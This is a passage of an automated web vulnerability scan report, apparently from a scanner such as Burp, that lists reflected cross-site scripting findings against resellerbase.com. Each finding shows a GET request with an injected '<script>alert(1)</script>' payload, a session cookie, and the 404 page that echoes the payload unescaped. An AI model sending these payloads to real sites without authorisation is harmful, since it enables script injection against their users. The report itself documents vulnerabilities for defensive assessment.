GET /web-service/web-hosting/themes7bab5<script>alert(1)</script>dcad761b354/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes7bab5<script>alert(1)</script>dcad761b354/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5536. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload faa69<script>alert(1)</script>5e274f9059c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosfaa69<script>alert(1)</script>5e274f9059c/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosfaa69<script>alert(1)</script>5e274f9059c/images/rating/ was not found on this server.</p>
...[SNIP]...

2.5537. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1e859<script>alert(1)</script>c42c4ef98ef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images1e859<script>alert(1)</script>c42c4ef98ef/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images1e859<script>alert(1)</script>c42c4ef98ef/rating/ was not found on this server.</p>
...[SNIP]...

2.5538. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4e497<script>alert(1)</script>9ac3422b427 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating4e497<script>alert(1)</script>9ac3422b427/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating4e497<script>alert(1)</script>9ac3422b427/ was not found on this server.</p>
...[SNIP]...

2.5539. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5683a<script>alert(1)</script>abb7a21ea5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/?5683a<script>alert(1)</script>abb7a21ea5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/?5683a<script>alert(1)</script>abb7a21ea5=1 was not found on this server.</p>
...[SNIP]...

2.5540. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d15f2<script>alert(1)</script>0fb98ea6245 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviced15f2<script>alert(1)</script>0fb98ea6245/web-hosting/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviced15f2<script>alert(1)</script>0fb98ea6245/web-hosting/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5541. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f92d<script>alert(1)</script>9894e58098b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting3f92d<script>alert(1)</script>9894e58098b/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting3f92d<script>alert(1)</script>9894e58098b/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5542. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 28773<script>alert(1)</script>532094cb8cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes28773<script>alert(1)</script>532094cb8cc/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes28773<script>alert(1)</script>532094cb8cc/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5543. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f1e19<script>alert(1)</script>73f0ce8a265 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosf1e19<script>alert(1)</script>73f0ce8a265/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosf1e19<script>alert(1)</script>73f0ce8a265/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5544. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a1ca9<script>alert(1)</script>e2547d40257 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesa1ca9<script>alert(1)</script>e2547d40257/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesa1ca9<script>alert(1)</script>e2547d40257/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.5545. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 39390<script>alert(1)</script>4d202c76a8a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating39390<script>alert(1)</script>4d202c76a8a/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating39390<script>alert(1)</script>4d202c76a8a/0.gif was not found on this server.</p>
...[SNIP]...

2.5546. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3fbe6<script>alert(1)</script>6104b9b2a4a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/0.gif3fbe6<script>alert(1)</script>6104b9b2a4a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/0.gif3fbe6<script>alert(1)</script>6104b9b2a4a was not found on this server.</p>
...[SNIP]...

2.5547. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8e7bd<script>alert(1)</script>2f5954816c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/rating/0.gif?8e7bd<script>alert(1)</script>2f5954816c1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/rating/0.gif?8e7bd<script>alert(1)</script>2f5954816c1=1 was not found on this server.</p>
...[SNIP]...

2.5548. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 876ce<script>alert(1)</script>f278be6c08a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service876ce<script>alert(1)</script>f278be6c08a/web-hosting/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service876ce<script>alert(1)</script>f278be6c08a/web-hosting/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5549. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 85513<script>alert(1)</script>d518a5d7b68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting85513<script>alert(1)</script>d518a5d7b68/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting85513<script>alert(1)</script>d518a5d7b68/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5550. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3869<script>alert(1)</script>c91f01ce0b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesd3869<script>alert(1)</script>c91f01ce0b5/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesd3869<script>alert(1)</script>c91f01ce0b5/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5551. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52189<script>alert(1)</script>0954e728f63 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos52189<script>alert(1)</script>0954e728f63/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos52189<script>alert(1)</script>0954e728f63/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5552. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 47d08<script>alert(1)</script>c7fb780f81f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images47d08<script>alert(1)</script>c7fb780f81f/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images47d08<script>alert(1)</script>c7fb780f81f/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.5553. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ba031<script>alert(1)</script>4b6db101ee was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/ratingba031<script>alert(1)</script>4b6db101ee/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/ratingba031<script>alert(1)</script>4b6db101ee/3half.gif was not found on this server.</p>
...[SNIP]...

2.5554. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/rating/3half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/rating/3half.gif

Issue detail

